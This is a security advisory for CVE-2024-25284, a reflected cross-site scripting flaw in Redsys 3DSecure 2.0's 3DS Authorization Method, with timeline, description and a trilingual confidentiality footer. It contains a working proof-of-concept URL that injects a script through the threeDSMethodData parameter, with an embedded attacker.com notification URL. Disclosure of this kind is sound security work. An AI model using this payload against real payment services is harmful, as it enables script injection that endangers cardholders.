3DSecure 2.0 3DS Authorization Method Cross Site Scripting

`Product: 3DSecure 2.0  
Manufacturer: Redsys  
Affected Version(s): 3DSecure 2.0 3DS Authorization Method  
Tested Version(s): 3DSecure 2.0 3DS Authorization Method  
Vulnerability Type: Cross-Site Scripting (XSS)  
Risk Level: Medium  
Solution Status: Not yet fixed  
Manufacturer Notification: 2024-01-17  
Solution Date: N/A  
Public Disclosure: 2024-09-17  
CVE Reference: CVE-2024-25284  
  
Overview:  
Multiple reflected Cross-Site Scripting (XSS) vulnerabilities in the 3DS Authorization Method of 3DSecure 2.0 allow attackers to inject arbitrary web scripts via the threeDSMethodData parameter.  
  
Vulnerability Details:  
The threeDSMethodData parameter is not sanitized before being processed, allowing attackers to inject scripts by concatenating code or modifying the base64-encoded information.  
  
Proof of Concept (PoC):  
An attacker can manipulate the threeDSMethodData parameter in the request URL to inject malicious code. Example:  
  
https://sis-d.redsys.es/sis-simulador-web/threeDsMethod.jsp?threeDSMethodData=eyJ0aHJlZURTTWV0aG9kTm90aWZpY2F0aW9uVVJMIjoiaHR0cHM6Ly9hdHRhY2tlci5jb20iLCJ0aHJlZURTU2VydmVyVHJhbnNJRCI6IjM5NDA4Mzk2LTdjY2MtNGU4YS04NjU2LThmMTZlNmNlMDQ5OCJ9%3d%3dld4ga%22%3e%3cscript%3ealert(1)%3c%2fscript%3epsoojei88ze  
  
Solution:  
No solution is currently available. Redsys has been notified of the issue.  
  
References:  
OWASP Web Security Testing Guide: Reflected Cross-Site Scripting  
  
Discoverer:  
Reported by Rubén López Herrera  
  
________________________________  
  
Este mensaje y sus adjuntos se dirigen exclusivamente a su destinatario, puede contener información privilegiada o confidencial y es para uso exclusivo de la persona o entidad de destino. Si no es usted. el destinatario indicado, queda notificado de que la lectura, utilización, divulgación y/o copia sin autorización puede estar prohibida en virtud de la legislación vigente. Si ha recibido este mensaje por error, le rogamos que nos lo comunique inmediatamente por esta misma vía y proceda a su destrucción.  
  
The information contained in this transmission is confidential and privileged information intended only for the use of the individual or entity named above. If the reader of this message is not the intended recipient, you are hereby notified that any dissemination, distribution or copying of this communication is strictly prohibited. If you have received this transmission in error, do not read it. Please immediately reply to the sender that you have received this communication in error and then delete it.  
  
Esta mensagem e seus anexos se dirigem exclusivamente ao seu destinatário, pode conter informação privilegiada ou confidencial e é para uso exclusivo da pessoa ou entidade de destino. Se não é vossa senhoria o destinatário indicado, fica notificado de que a leitura, utilização, divulgação e/ou cópia sem autorização pode estar proibida em virtude da legislação vigente. Se recebeu esta mensagem por erro, rogamos-lhe que nos o comunique imediatamente por esta mesma via e proceda a sua destruição  
  
`